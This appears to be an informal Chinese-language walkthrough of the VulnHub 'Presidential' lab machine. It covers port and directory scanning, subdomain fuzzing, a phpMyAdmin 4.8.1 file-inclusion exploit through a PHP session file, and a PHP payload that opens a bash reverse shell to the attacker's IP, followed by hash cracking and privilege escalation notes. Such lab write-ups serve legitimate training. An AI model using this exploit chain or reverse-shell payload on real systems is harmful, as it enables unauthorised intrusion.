靶机地址：https://download.vulnhub.com/presidential/Presidential.ova

主机发现

arp-scan -l

端口扫描

nmap --min-rate 10000 192.168.21.150

端口服务扫描

nmap -sV -sT -O -p80 192.168.21.150

漏洞扫描

nmap --script=vuln -p80 192.168.21.150

只有一个端口

目录扫描

gobuster dir -u http://192.168.21.150 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

这个没用

换个工具扫一下

dirsearch -u "http://192.168.21.150/" -e *

这里面先去看config

好东西哦

这里只能扫到80端口

接下来就只能去找一下域名了

修改域名，再扫一遍

gobuster dir -u http://192.168.21.150/ -w SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt

扫不出来，只剩下子域名爆破

wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local

改host访问

登入就行

好东西

这里先放着大概率不行的

版本

先去看看有没有洞

这个版本是4.8.1

啊这这个是winddows的

下一个应该就是linux的了

过程很清楚

这里需要包含cookie

jn284slhmdsjnbel58uruk855v80nbi1

包含session

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_jn284slhmdsjnbel58uruk855v80nbi1（讲sess后面替换）

成功了，反弹shell（要登出一下，因为session会冲突只触发第一次的php命令）

select '<?php system("bash -i >& /dev/tcp/192.168.21.131/666 0>&1");exit;?>'

Session

挂监听

反弹成功

信息收集

getcap -r / 2>/dev/null

找查看开启capabilities的工具（capabilities资料：Linux Capabilities 简介 - sparkdev - 博客园 (cnblogs.com)）

有两个ping和tars个软件，去https://gtfobins.github.io/查一下

坏了没有提权的机会，去看一下权限的组了

？？？

小脑萎缩了

发现了一件事，进错用户了

去admin（root大概率进不去），想起来了admin这里要密码密码在数据库里面出现过

啊啊啊啊

暴力破解，建议用vim写进去，直接重定向会寄

Emmm各种花式大爆炸

去网上查了一下发现要影子文件还要passwd文件

我们拿到的其实是影子文件加密后的密码3

发现我有台机子就是不行

换了一台就好了（这就是传说中的水土不服？）

Passwd在前影子在后写进心得文件

登入admin

信息收集（应该大差不差）

还是一样的吧root用户的密码爆破出来

发现不行，看看使用ssh

Emm真有ssh之前没扫出来

确实有，还是要多扫即便

改权限（反弹shell我连不上就吧文件复制下来用攻击机连的）

ok